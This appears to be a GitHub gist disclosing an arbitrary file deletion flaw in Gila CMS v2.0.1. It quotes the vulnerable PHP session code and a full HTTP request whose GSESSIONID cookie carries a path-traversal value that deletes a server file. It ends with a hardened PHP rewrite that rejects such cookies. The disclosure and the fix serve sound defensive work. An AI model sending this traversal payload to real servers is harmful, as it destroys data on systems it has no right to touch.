@victomteng1997
Last active June 2, 2021 14:45
Gila CMS v2.0.1 Unrestricted File Deletion

Gila CMS (https://github.com/GilaCMS, https://gilacms.com/) v2.0.1 and below is vulnerable to an arbitrary file deletion attack: an attacker can delete arbitrary files from the remote server by sending a maliciously crafted GET request. In this version, a previous unrestricted file upload vulnerability (https://gist.github.com/victomteng1997/73cf75b97829a153b5100fddde9b1290) is patched, but the webapp is still vulnerable.

Take Gila CMS v2.0.1 (https://github.com/GilaCMS/gila/tree/2c9baf5bf4a1aa308482655b0df2a7dbc21180fa) as an example. The vulnerable component is in src/core/classes/Session.php:

if (isset($_COOKIE['GSESSIONID'])) {
    // The cookie value is concatenated into a filesystem path without any validation
    if (!file_exists(LOG_PATH.'/sessions/'.$_COOKIE['GSESSIONID'])) {
        User::metaDelete(self::userId(), 'GSESSIONID', $_COOKIE['GSESSIONID']);
        self::destroy();
    }
}

which calls:

public static function destroy()
{
    if (self::userId()>0) {
        $session_log = new Logger(LOG_PATH.'/sessions.log');
        $session_log->info('End', ['user_id'=>self::userId(), 'email'=>self::key('user_email')]);
    }
    // Sink: the unvalidated cookie value reaches unlink(), and the @ hides any error
    @unlink(LOG_PATH.'/sessions/'.$_COOKIE['GSESSIONID']);
    @$_SESSION = [];
    @session_destroy();
}

The $_COOKIE['GSESSIONID'] value is not filtered or validated, so a path-traversal sequence in the cookie makes the @unlink call delete any file the webapp user has sufficient write access to.

A sample request (sent through Burp) that deletes the file /tmp/test.txt:

GET /gila/?c=random_user HTTP/1.1
Host: localhost
User-Agent: "arbitrary content"
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: GSESSIONID=../../../../../../../tmp/test.txt
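For comparison, the following is an added example of how the session file handling above can be hardened; it is not Gila CMS's own code or its upstream patch. It uses a stand-in LOG_PATH under the system temp directory and hypothetical function names (safeSessionId, sessionFilePath, destroySessionFile). Two independent checks are applied: the cookie value must match a strict allow-list of session-id characters, and the resolved path must still be inside the sessions directory after realpath(). A traversal cookie such as the one in the request above fails the first check, and a symlink placed in the sessions directory fails the second.

```php
<?php
// Added example (not Gila CMS's own code): hardened handling of the GSESSIONID
// cookie. Assumption: LOG_PATH here is a stand-in for the real constant.
define('LOG_PATH', sys_get_temp_dir() . '/gila_log_example');

/**
 * Return the cookie value only if it is a plain session token, else null.
 * PHP-generated session ids contain only [A-Za-z0-9,-], so a strict
 * allow-list rejects traversal sequences without affecting real clients.
 */
function safeSessionId(?string $raw): ?string
{
    if ($raw === null || $raw === '') {
        return null;
    }
    if (!preg_match('/\A[A-Za-z0-9,-]{1,128}\z/', $raw)) {
        return null;
    }
    return $raw;
}

/**
 * Resolve the session file and confirm it lives inside LOG_PATH/sessions.
 * Returns the canonical path, or null if the file is missing or the
 * resolved location escaped the directory (e.g. through a symlink).
 */
function sessionFilePath(string $id): ?string
{
    $dir = realpath(LOG_PATH . '/sessions');
    if ($dir === false) {
        return null;
    }
    $path = realpath($dir . '/' . $id);
    if ($path === false) {
        return null; // no such session file
    }
    if (strncmp($path, $dir . DIRECTORY_SEPARATOR, strlen($dir) + 1) !== 0) {
        return null; // resolved outside the sessions directory
    }
    return $path;
}

/**
 * Hardened counterpart of Session::destroy(): only a validated, in-directory
 * session file is ever passed to unlink(), and errors are not suppressed.
 */
function destroySessionFile(): void
{
    $id = safeSessionId($_COOKIE['GSESSIONID'] ?? null);
    if ($id !== null) {
        $path = sessionFilePath($id);
        if ($path !== null) {
            unlink($path);
        }
    }
    $_SESSION = [];
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_destroy();
    }
}

// Demonstration with constructed inputs.
@mkdir(LOG_PATH . '/sessions', 0700, true);
file_put_contents(LOG_PATH . '/sessions/abc123', '');

var_dump(safeSessionId('abc123'));
var_dump(safeSessionId('../../../../../../../tmp/test.txt'));
var_dump(sessionFilePath('abc123') !== null);

$_COOKIE['GSESSIONID'] = '../../../../../../../tmp/test.txt';
destroySessionFile(); // rejected at safeSessionId(); nothing is unlinked
```

The allow-list check alone is enough to stop the traversal shown in this gist; the realpath() containment check is kept because it also defends against a session file that has been replaced by a symlink pointing elsewhere, which the character filter cannot see.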